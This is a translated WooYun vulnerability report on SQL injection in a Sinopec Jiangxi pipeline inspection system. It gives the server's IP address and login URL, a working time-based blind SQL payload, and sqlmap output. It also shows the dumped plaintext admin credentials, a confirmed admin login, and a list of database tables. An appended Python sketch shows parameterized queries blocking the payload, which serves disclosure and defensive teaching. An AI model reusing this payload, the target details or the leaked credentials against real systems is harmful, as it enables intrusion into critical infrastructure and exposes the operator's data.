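Vulnerability summary

Bug ID: wooyun-2015-0117682

Title: SQL injection in a Sinopec system

Vendor: 中国石油化工股份有限公司 (China Petroleum & Chemical Corporation, Sinopec)

Author: 路人甲

Submitted: 2015-06-02 11:52

Fixed: 2015-06-07 11:54

Disclosed: 2015-06-07 11:54

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: The vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org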


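Vulnerability details

Disclosure status:

2015-06-02: Details sent to the vendor; waiting for the vendor to respond
2015-06-07: The vendor chose to ignore the vulnerability; details released to the public

Brief description:

15

Detailed description:

15

Proof of vulnerability:

Address:
http://120.203.228.129/shihua/#
Sinopec Jiangxi pipeline inspection management system
POST data: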
GET /shihua/login.php?user=admin&psw=111 HTTP/1.0
Host: 120.203.228.129
Proxy-Connection: keep-alive
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Referer: http://120.203.228.129/shihua/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Injection type:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: user (GET)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: user=admin' AND SLEEP(5) AND 'kaQc'='kaQc&psw=111
---
[01:00:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.11
[01:00:00] [INFO] fetching columns for table 'system_admin' in database 'shihua'
[01:00:00] [WARNING] time-based comparison requires larger statistical model, pl
The admin account was dumped:

[screenshot]


Database: shihua
Table: system_admin
[1 entry]
+----+-------+--------+---------+
| id | Psw | User | Project |
+----+-------+--------+---------+
| 1 | nimda | admin | 1 |
+----+-------+--------+---------+
Login succeeded:

[screenshots]

http://120.203.228.129/shihua/admin.html (admin back end)

[screenshots]

Terminal information is exposed:

[screenshot]

Other tables:
[00:43:07] [INFO] retrieved: location_event
[00:44:19] [INFO] retrieved: location_event2
[00:44:40] [INFO] retrieved: location_record
[00:45:19] [INFO] retrieved: location_record_all
[00:45:57] [INFO] retrieved: location_uppic
[00:46:34] [INFO] retrieved: location_upvideo
[00:47:12] [INFO] retrieved: location_upvoice
[00:47:44] [INFO] retrieved: map_markinfo
[00:48:43] [INFO] retrieved: shihua_ParallelLines
[00:50:19] [INFO] retrieved: shihua_Voltage
[00:51:02] [INFO] retrieved: shihua_bijindian
[00:51:51] [INFO] retrieved: shihua_bijindianline
[00:52:29] [INFO] retrieved: shihua_moving
[00:53:09] [INFO] retrieved: shihua_noscan
[00:53:47] [INFO] retrieved: shihua_parallellines
[00:54:59] [INFO] retrieved: shihua_pipe
[00:55:23] [INFO] retrieved: shihua_pipeline
[00:55:56] [INFO] retrieved: shihua_pipeline2
[00:56:18] [INFO] retrieved: shihua_statistics
[00:57:13] [INFO] retrieved: system_admin
[00:58:08] [INFO] retrieved: system_device
[00:58:43] [INFO] retrieved: system_device_h
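It was running too slowly, so I stopped here.

Remediation:

Filter the input.

Copyright notice: when reposting, please credit the source, 路人甲@乌云 (WooYun)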
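
The remediation above says only to filter input. As an added example (not code from the report or from the affected system), the sketch below uses parameter binding instead of filtering and replays the `user` payload from the sqlmap output against a constructed SQLite stand-in for `system_admin`. The stubbed `SLEEP()` function, the salted-hash columns and all function names are assumptions made for the demonstration.

```python
import hashlib
import hmac
import os
import sqlite3

# Value of the `user` parameter exactly as printed in the sqlmap output above.
PAYLOAD = "admin' AND SLEEP(5) AND 'kaQc'='kaQc"

def hash_pw(password, salt):
    # Store a salted PBKDF2 hash rather than the plaintext column in the dump.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """Constructed in-memory table; SLEEP() is a stub that records each call."""
    conn = sqlite3.connect(":memory:")
    sleep_calls = []
    def fake_sleep(seconds):
        sleep_calls.append(seconds)
        return 0  # MySQL's SLEEP() also returns 0 after a normal delay
    conn.create_function("SLEEP", 1, fake_sleep)
    conn.execute("CREATE TABLE system_admin "
                 "(id INTEGER PRIMARY KEY, User TEXT, Salt BLOB, PswHash BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO system_admin (User, Salt, PswHash) VALUES (?, ?, ?)",
                 ("admin", salt, hash_pw("constructed-pw", salt)))
    return conn, sleep_calls

def _check(row, psw):
    # Constant-time comparison of the stored hash with the submitted password.
    return row is not None and hmac.compare_digest(row[1], hash_pw(psw, row[0]))

def login_concatenated(conn, user, psw):
    # Vulnerable pattern: the request parameter becomes part of the SQL text.
    sql = "SELECT Salt, PswHash FROM system_admin WHERE User = '" + user + "'"
    return _check(conn.execute(sql).fetchone(), psw)

def login_parameterized(conn, user, psw):
    # Hardened pattern: the value is bound as data and never parsed as SQL.
    sql = "SELECT Salt, PswHash FROM system_admin WHERE User = ?"
    return _check(conn.execute(sql, (user,)).fetchone(), psw)

def demo():
    conn, calls = make_db()
    login_concatenated(conn, PAYLOAD, "111")
    concat_calls = len(calls)   # injected SLEEP() was executed by the database
    calls.clear()
    login_parameterized(conn, PAYLOAD, "111")
    ok = login_parameterized(conn, "admin", "constructed-pw")
    return concat_calls, len(calls), ok

if __name__ == "__main__":
    print(demo())
```

With the bound parameter the whole payload is compared to the `User` column as a literal string, so the database function in it never runs and the timing side channel sqlmap relied on disappears.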


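Vulnerability response

Vendor response:

Severity: No impact, ignored by the vendor

Ignored at: 2015-06-07 11:54

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet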